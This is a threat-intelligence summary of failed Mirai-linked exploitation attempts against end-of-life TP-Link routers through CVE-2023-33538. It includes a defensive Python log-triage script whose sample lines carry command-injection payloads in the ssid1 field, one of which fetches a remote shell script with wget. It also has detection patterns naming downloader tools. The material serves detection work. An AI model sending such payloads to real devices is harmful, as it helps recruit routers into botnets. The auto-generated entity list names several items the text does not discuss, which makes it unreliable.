Exploitation Attempts on TP-Link Routers via CVE-2023-33538 Linked to Mirai Malware
Severity: Medium (Score: 54.9)
Sources: Cybersecuritydive, Cybersecuritynews, web.archive.org, Gbhackers
Summary
Attackers are actively probing a command injection vulnerability, CVE-2023-33538, in several end-of-life TP-Link router models, including the TL-WR940N and TL-WR841N. The flaw allows an attacker to execute arbitrary operating-system commands through the routers' web management interface, particularly via the ssid1 parameter. Exploitation attempts have been observed in the wild, but none has succeeded so far: the requests were built incorrectly, targeting the wrong parameter, and did not carry the valid authentication that the vulnerable handler requires. The vulnerability was disclosed in June 2023 and was added to CISA's Known Exploited Vulnerabilities catalog in June 2025. The observed payloads resemble Mirai botnet malware, suggesting an effort to recruit these routers into a new botnet. Because the affected models no longer receive security updates there is no patch; users are advised to replace the devices and, in the meantime, to change any default credentials so that an attacker cannot satisfy the authentication requirement. Researchers continue to monitor and analyze the activity.

Key Points
• CVE-2023-33538 affects multiple end-of-life TP-Link router models.
• Exploitation attempts are linked to Mirai-like malware but have not succeeded yet.
• Users are urged to replace vulnerable routers and change default credentials.
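The summary above describes three things a defender can check for in router web-interface logs: a shell-metacharacter payload in the ssid1 parameter, whether the request carried valid authentication, and whether the payload tries to fetch a downloader in Mirai style. The following Python triage script, added here as an illustration and not taken from any of the cited sources or from TP-Link, puts those checks together over a few constructed log lines. It assumes a handler path of /userRpm/WlanNetworkRpm (from the public CVE entry, not from this page) and a minimal made-up log format of `<METHOD> <path?query> auth=<yes|no>`; the `auth` field stands in for whatever session evidence a real device log provides.

```python
"""Triage CVE-2023-33538-style command-injection attempts in router web logs.

Added illustration only; not code from the page's sources or from TP-Link.
Assumptions not stated on the page: the vulnerable handler is served under
/userRpm/WlanNetworkRpm (taken from the public CVE entry), and the log
format is the minimal '<METHOD> <path?query> auth=<yes|no>' form used for
the constructed samples below.
"""
import re
from urllib.parse import urlsplit, unquote_plus

VULN_PARAM = "ssid1"                          # injection point named on the page
VULN_PATH_PREFIX = "/userRpm/WlanNetworkRpm"  # assumed handler path (see above)

# Shell metacharacters that turn an SSID into a command (CWE-78 indicators).
SHELL_META = re.compile(r"[;|`\n]|\$\(|\$\{")
# Downloaders typical of Mirai-style staging (T1105 ingress tool transfer).
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|busybox)\b")

LOG_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) auth=(?P<auth>yes|no)$")

# Constructed sample lines, not captured traffic.
SAMPLE_REQUESTS = [
    "GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeNet&region=0 auth=yes",
    "GET /userRpm/WlanNetworkRpm.htm?ssid1=HomeNet;wget+http://198.51.100.7/x.sh auth=no",
    "GET /userRpm/WlanNetworkRpm.htm?ssid=`wget+http://198.51.100.7/x.sh` auth=no",
    "GET /userRpm/WlanNetworkRpm.htm?ssid1=%24(id)&Save=Save auth=yes",
    "GET /userRpm/StatusRpm.htm auth=yes",
]


def parse_query(query):
    """Split a query string on '&' only.

    Deliberately not urllib.parse.parse_qsl: older Pythons also split on ';',
    which would hide the very character an injection attempt relies on.
    """
    pairs = []
    for field in query.split("&"):
        if field:
            name, _, value = field.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify(line):
    """Return a verdict dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    url = urlsplit(target)
    if not url.path.startswith(VULN_PATH_PREFIX):
        return {"target": target, "verdict": "other-path"}

    authenticated = m.group("auth") == "yes"
    params = parse_query(url.query)
    suspicious = [(k, v) for k, v in params if SHELL_META.search(v)]
    if not suspicious:
        return {"target": target, "verdict": "benign"}

    if not any(k == VULN_PARAM for k, _ in suspicious):
        verdict = "attempt-misfired-param"    # payload sent, but not in ssid1
    elif not authenticated:
        verdict = "attempt-unauthenticated"   # handler needs a valid session
    else:
        verdict = "attempt-authenticated"     # the only shape that could run
    return {
        "target": target,
        "verdict": verdict,
        "authenticated": authenticated,
        "downloader": any(DOWNLOADER.search(v) for _, v in suspicious),
        "payload": suspicious,
    }


def scan(lines):
    """Classify every parseable line; callers can filter on verdict."""
    return [r for r in map(classify, lines) if r is not None]


if __name__ == "__main__":
    for result in scan(SAMPLE_REQUESTS):
        print(result["verdict"], result["target"])
```

Run stand-alone it prints one verdict per sample line. To use it on real access logs, replace `LOG_RE` with a pattern for the device's actual log format and map whatever session or cookie evidence the log carries onto the `auth` group; the "attempt-misfired-param" and "attempt-unauthenticated" verdicts correspond to the failed attempts the summary describes, while "attempt-authenticated" is the only class that warrants treating the device as possibly compromised.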
Key Entities
- Sapphire Sleet (apt_group)
- Botnet (attack_type)
- Command Injection (attack_type)
- Data Breach (attack_type)
- DDoS (attack_type)
- Malware (attack_type)
- TP-Link (company)
- CVE-2020-27600 (cve)
- CVE-2021-46315 (cve)
- CVE-2021-46319 (cve)
- CVE-2023-33538 (cve)
- CWE-78 - OS Command Injection (cwe)
- CWE-798 - Use of Hard-coded Credentials (cwe)
- Condi (malware)
- Mirai (malware)
- T1059 - Command and Scripting Interpreter (mitre_attack)
- T1071 - Application Layer Protocol (mitre_attack)
- T1105 - Ingress Tool Transfer (mitre_attack)
- TP-Link Archer Routers (platform)
- TP-Link Omada Routers (platform)
- Windows Server (platform)
- wget (tool)